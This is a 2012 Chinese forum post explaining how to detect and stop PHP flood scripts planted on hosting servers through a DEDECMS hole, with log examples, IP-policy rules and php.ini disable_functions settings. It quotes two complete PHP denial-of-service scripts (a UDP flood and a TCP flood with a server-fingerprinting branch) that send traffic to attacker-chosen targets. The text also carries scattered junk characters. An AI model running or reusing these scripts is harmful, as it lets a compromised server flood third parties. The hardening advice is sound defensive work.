找回密码
 加入怎通
查看: 1580|回复: 3

[原创] 服务器php对外发包引起崩溃的解决办法

[复制链接]
商摆小路 发表于 2012-06-12 13:06:58 | 显示全部楼层 |阅读模式
  服务器php对外发包引起崩溃的解决办法paopao最近老听人说,php对外发包,引起服务器崩溃或被机房查封,今天闲着无事和大家一起分享paopao我总结的DEDECMS php对外发包引发服务器崩溃的终极解决方法,希望可以帮助大家解决服务器问题,让网站运行的更好) D: U4 ~0 |9 i& A; C; X
  一。php对外发包分析/ |6 l! A/ }( `! F5 n
  用php代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下:
% z3 G3 X; G3 d0 S0 D& i  以下是代码片段:$ D! o5 {( |" y1 E
  $packets = 0;
/ m, q7 z7 I6 K9 C- V7 O  $ip = $_GET[\'ip\'];
; p' ~# ~5 S& Q' W" \* @# W6 s& v  $rand = $_GET[\'port\'];
2 G& e; |# X4 |  set_time_limit(0);
4 }! `' U/ \' Z7 V7 ?  ignore_user_abort(FALSE);- E# a& B0 O$ l" W' l+ _! x
  $exec_time = $_GET[\'time\'];sbxl-20120612
2 N9 l6 R# H  N$ O0 Y  $time = time();
& a  I' J$ E8 P/ D  print \'Flooded: $ip on port $rand
# z* M" `+ n( ~' y" K, G8 {! _# P  \';
2 N1 T' |; d( `' T+ h  $max_time = $time+$exec_time;& M% M$ R0 t  V
  for($i=0;$i<65535;$i++){
. `  _' h- V% u4 V  $out .= \'X\';
1 Q3 b# H* F/ E  k4 c+ `  w  g  }! t2 n; P0 R# }3 R) d
  while(1){
) Y" q- F9 U% }% m' e/ i" X0 ~  $packets++;4 e$ D1 E* ?7 M3 R8 W5 B
  if(time() > $max_time){
. q/ ^8 @/ v3 t0 o; C# m  break;
% ]  E0 n6 I; C  }" C- e$ T* I( w& k& I* p8 K, T
  $fp = fsockopen(\'udp://$ip\', $rand, $errno, $errstr, 5);
" T  w! W7 N. h8 q5 c6 k9 T0 N  if($fp){
1 v7 U( O  j* w  fwrite($fp, $out);
6 {, e0 y0 p  _; ?3 y  fclose($fp);: e. T; h! O# b/ M
  }4 w4 {* Z1 F0 Q% {% {
  }8 _* [; R# [. q; s" ^# u* \
  echo \'Packet complete at \'.time(\'h:i:s\').\' with
9 A: Q. M. w( O8 R( U. \6 t( V# b  $packets (\' . round(($packets*65)/1024, 2) . \' mB) packets averaging \'.
8 j8 Q1 K3 a! N  round($packets/$exec_time, 2) . \' packets/s ;0 ]& q4 i0 I& Z8 Q: Z( x
  ?>
4 x( p7 k' m3 a3 B  U1 P+ h/ t  二。表现特征
0 h/ J; v: d0 Z* Y% C  一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是服务器不断收到大量数据包.
4 m' k' ]' X" r+ R" ^  近期由于DEDECMS出现漏洞而导致大量服务器出现这个问题.
( {7 x7 s2 O! W# w* Z# y) L  如何快速找到这些站?
# }0 H2 C9 l; c$ x1 M# N% L  你可以打开日志. c% O  {3 U# ^1 R$ W: y
  C:\Windows\System32\LogFiles\HTTPERR\httperr...log,打开今天时间的文件,7 w4 S) n! I/ w# j/ I9 P+ h* z: s
  里面有类似这样的记录:, d# j0 P! i) S
  2012-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1% U+ I  b& M8 c# n
  最后三项783 Disabled 30_FreeHost_1
3 l7 n# H) O5 k6 q& b6 f  783就是这个站在IIS中的ID) f) w8 ]- q# ^1 P1 Y8 N
  30_FreeHost_1就是所在池5 o) ?6 }& v% j7 f6 S
  三?解决办法
, [. T: N# d' n; ]. c  1.按上述找到这个网站后停止它.或停止池,并重启IIS.
# R+ ^. B# `+ r& X' n  2.在IP策略,或防火墙中,禁止所有udp向外发送% u3 o/ z7 U3 `" ~6 {* b' F3 n% [
  在星外最新版本的安全包中,已带有4.0版本的IP策略【下载safe包】,您导入后就直接可以限制了外发的UDP包?下载这个包,之后导入安全策略?但这个策略并没有关闭DNS端口,部分攻击还是有效.! l% U$ k+ \# T) N
  为了解决这个问题,你也可以调整IP策略,限制udp只能访问特定的DNS服务器IP,如8.8.8.8,除非黑客攻击这个IP,不然攻击也是无效的,你可以在网卡DNS中设置一个你才知道的DNS IP,并且不要公开,然后调用IP策略中的udp open部分就可以解决.(打开IP策略的属性,双击open,将open中的两条udp记录删除任意一条,在保留的这条中,双击,改成 地址 从源地址 任何地址 到目标地址'特定IP 这个IP就是设置为你自己的DNS IP,如8.8.8.8' 保存后就行了)
) F7 U' h: q" d' M  在2011-4-27,我们上传了新的安全包,里面有一个'星外虚拟主机管理平台IP策略关闭所有UDP端口用.ipsec'文件,您可以导入它并启用,就可以关闭所有udp端口,就可以完全防止这类攻击,但是,这个策略由于关闭了DNS端口,会造成的这台服务器上无法用IE访问任何域名,因此,用户的采集功能也就用不了.(同样,如果在主控网站上用了这个策略,就会造成的受控自检不通过,因为解析不了域名,另外,部分用户反映此策略会造成的mysql不正常). E  C/ o+ _- K+ n% l; t8 A; j$ }
  3.用一流信息监控,在SQL拦截及网址拦截中,拦截port=这个关键词(其他关键词可以删除.)
5 T$ }3 K9 P, d  x4 w; @  4.也可以直接禁止上面的代码,如改win\php.ini后重启IIS2 t/ d  D0 [1 k6 p+ B, ~. R! h( W' x6 V
  ignore_user_abort = On  F8 n5 [0 S5 X* Q, Q' a
  (注意前面的;号要删除)3 Y/ c, t+ j, w6 R% N/ t+ }( F
  disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,) l2 f% x" J4 L( [( g
  在后面加上
; V8 x1 r  ]& z2 X0 ?/ M1 \  v  fsockopen,set_time_limit! b7 v$ m3 `" ^
  但这样会造成很多php程序都不正常.  w+ i: R0 u, r! G
  另外,这也表明你的服务器安全做得不错,如果能入侵.黑客就直接提权了,还DOS做什么?
& T' B8 V9 c2 E1 g  b1 ~  近期已有新的基于TCP攻击的PHPDDOS代码如下:& G* P* J0 m2 r' P# H7 n, z
  以下是代码片段:+ h: U: c( ~- T
  set_time_limit(999999);
- J" V- e2 K4 Z  $host = $_GET['host'];; z" s4 F7 @" ]& l' _; v; D* m
  $port = $_GET['port'];$ }' h* ^0 e$ e" }6 f, n: |
  $exec_time = $_GET['time'];7 B4 a" f; Q. m( z, n8 b: Q
  $packets = 64;6 L" s1 P! g2 t% L/ I4 Y7 b
  ignore_user_abort(True);% |. U9 Q' `: e/ Z' g
  if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){2 R1 Z+ k: n* e9 u. V
  if (StrLen($_GET['rat'])<>0){& I: V+ `, ^$ y$ Z7 Y$ g5 M; ^
  echo $_GET['rat'].$_SERVER['HTTP_HOST'].'|'.GetHostByName($_SERVER['SERVER_NAME']).'|'.
! F# H0 ?& U9 f& D  php_uname().'|'.$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];' Y' i$ I) h) y' i% e, o
  exit;5 y% O+ t  H! m7 V* N; j% m& }
  }
) m! D/ |2 A' g* Q2 z/ ~, J  exit;' F) e0 ]& h# y  z1 n. W7 [
  }+ Y5 T* S" i& C. i8 K* q1 }& S
  $max_time = time()+$exec_time;
6 d4 t+ a# J3 z8 `9 a" P  while(1){
3 R: |% o# i' t9 K# e! p# s  $packets++;0 j5 I1 ~: W7 `% c& I* r" S5 U
  if(time() > $max_time or $exec_time != 69){3 c0 C# u/ N4 `5 z0 M* F
  break;. B4 J7 _; B7 H5 \
  }
9 D5 `* Z6 Q, s2 {* |9 Y  $fp = fsockopen('tcp://$host', $port, $errno, $errstr, 0);" l- r8 A  [, h
  }/ |. p# e9 b6 A8 L
  ?>
+ u$ d& |1 G  X/ g+ f$ N0 ]  同样,可以采有以下解决办法:
' M  _' j! y  T0 I( q  1.也可以直接禁止上面的代码,如改win\php.ini后重启IIS
# g; O3 I, A+ ]+ u  ignore_user_abort = On& A' Q& n( D+ p7 T8 P
  (注意前面的;号要删除)6 @: u6 `$ P, O5 Z  U: p8 P
  disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,: {- w% h- S9 q- ]7 y: T
  在后面加上
4 o& B+ a$ g6 m  fsockopen,set_time_limit
& Q) s8 m* e% V- E  但这样会造成很多php程序都不正常. 如果您是IDC,给客户提供空间的,禁用函数可能导致客户程序无法运行,所以一般不要用此办法
6 W% S, u7 P  s  2.在IP策略中禁止所有外访的TCP数据包,但这样会造成的采集功能无效,也不能用在主控服务器上?
+ W2 s* L, T- I  3.在服务器要用关键词tcp:或udp:搜索所有php类文件,找到攻击文件,删除它?
/ R7 r7 l1 ^6 _+ h3 e* [        文章出自医院网站优化 http://www.ahyyqing.com,转载请注明出处。
- M+ @* c8 z) e. w

评分

参与人数 1ZZ币 +40 收起 理由
TONY + 40 这个很受用,我们也遇到了这个问题!

查看全部评分

回复

使用道具 举报

TONY 发表于 2012-06-12 13:39:53 | 显示全部楼层
很好 感谢分享啊
回复 支持 反对

使用道具 举报

幸福的蚂蚁 发表于 2025-11-10 20:26:34 | 显示全部楼层
分析得很透彻,很多细节都说到点子上了~
回复 支持 反对

使用道具 举报

DAIV 发表于 2026-02-17 01:26:21 | 显示全部楼层
楼主太厉害了,整理得这么详细,必须支持
回复 支持 反对

使用道具 举报

    您需要登录后才可以回帖 登录 | 加入怎通

    本版积分规则

    QQ|手机版|小黑屋|网站地图|真牛社区 ( 苏ICP备2023040716号-2 )

    GMT+8, 2026-3-13 14:30 , Processed in 0.199184 second(s), 29 queries , Gzip On.

    免责声明:本站信息来自互联网,本站不对其内容真实性负责,如有侵权等情况请联系420897364#qq.com(把#换成@)删除。

    Powered by Discuz! X3.5

    快速回复 返回顶部 返回列表